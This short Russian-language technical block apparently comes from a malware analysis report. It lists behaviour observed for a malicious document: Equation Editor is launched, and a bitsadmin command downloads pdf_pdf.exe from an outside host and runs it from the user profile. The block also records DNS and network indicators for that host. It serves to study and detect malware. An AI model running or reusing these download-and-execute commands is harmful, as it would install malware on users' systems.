Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer lO /priority foreground https://coryl.usa.cc/pdf_pdf.exe %USERPROFILE%\Ll.exe && start %USERPROFILE%\Ll.exe
- 'co###.usa.cc':443
- DNS ASK co###.usa.cc
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer lO /priority foreground https://coryl.usa.cc/pdf_pdf.exe %USERPROFILE%\Ll.exe && start %USERPROFILE%\Ll.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer lO /priority foreground https://coryl.usa.cc/pdf_pdf.exe %HOMEPATH%\Ll.exe